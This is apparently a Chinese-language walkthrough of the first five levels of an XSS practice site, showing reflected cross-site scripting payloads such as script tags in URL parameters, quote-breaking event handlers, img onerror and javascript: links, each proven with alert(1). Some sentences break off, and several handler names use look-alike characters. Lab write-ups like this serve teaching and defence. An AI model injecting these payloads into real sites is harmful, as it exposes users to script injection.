<center><img src="level.png"></center> //源码
<center><img src=x onerror=alert(1)></center> //将其修改为这样即可bug通关
详尽的XSS跨站脚本攻击请看:XSS跨站脚本攻击原理与常见的脚本及《XSS跨站脚本攻击剖析与防御》摘录总结
页面中没有输入点,但发现通过地址栏传入的参数‘name=test’会回显在页面,
http://test.xss.tv/level1.php?name=test
尝试通过在URL中构造payload完成XSS攻击:
http://test.xss.tv/level1.php?name=<script>alert(1);</script>
触发弹窗,完成的不错!通关。
页面存在输入框,搜索的数据在页面有回显,在搜索框构造payload并提交:
<script>alert(1);</script>
返回的页面并没有触发弹窗,查看网页源代码:
<h1 align=center>欢迎来到level2</h1>
<h2 align=center>没有找到和<script>alert(1);</script>相关的结果.</h2><center>
<form action=level2.php method=GET>
<input name=keyword value="">
发现在
"><script>alert(1);</script>
//提交后源码变为:
<input name=keyword value=""><script>alert(1);</script>">
触发弹窗,完成的不错!通关。
页面存在输入框,搜索的数据在页面有回显,在搜索框构造payload并提交:
<script>alert(1);</script>
返回的页面并没有触发弹窗,查看网页源代码:
<h1 align=center>欢迎来到level3</h1>
<h2 align=center>没有找到和<script>alert(1);</script>相关的结果.</h2><center>
<form action=level3.php method=GET>
<input name=keyword value='<script>alert(1);</script>'>
发现在
<h2 align=center>没有找到和<"/()'>相关的结果.</h2><center>
<form action=level3.php method=GET>
<input name=keyword value='<"/()'>'>
尝试闭合‘value’的值,通过事件触发弹窗,在输入框构造新的payload:
' οnmοuseοver='alert(1)
//提交后源码变为:
<input name=keyword value='' onmouseover='alert(1)'>
鼠标移到输入框便触发事件产生弹窗,完成的不错!通关。
页面存在输入框,搜索的数据在页面有回显,尝试搜索“<"/()’>”,在网页源代码中查看符号被转译的情况,
<h1 align=center>欢迎来到level4</h1>
<h2 align=center>没有找到和<"/()'>相关的结果.</h2><center>
<form action=level4.php method=GET>
<input name=keyword value=""/()'">
发现在
" οnmοuseοver="alert(1)
//提交后源码变为:
<input name=keyword value="" onmouseover="alert(1)">
鼠标移到输入框便触发事件产生弹窗,完成的不错!通关。
页面存在输入框,搜索的数据在页面有回显,尝试搜索“<"/()’>”,在网页源代码中查看符号被转译的情况,
<h1 align=center>欢迎来到level5</h1>
<h2 align=center>没有找到和<"/()'>相关的结果.</h2><center>
<form action=level5.php method=GET>
<input name=keyword value="<"/()'>">
搜索"onmouseover"和’’,在网页源代码中查看符号被转译的情况,
<input name=keyword value="o_nmouseover">
<input name=keyword value="alert(1);" >
发现在
">:alert(1);">aaa</a>
//提交后源码变为:
<input name=keyword value=""><a href="javascript:alert(1);">aaa</a>">
通过点击aaa链接,触发javascript脚本引用属性产生弹窗,完成的不错!通关。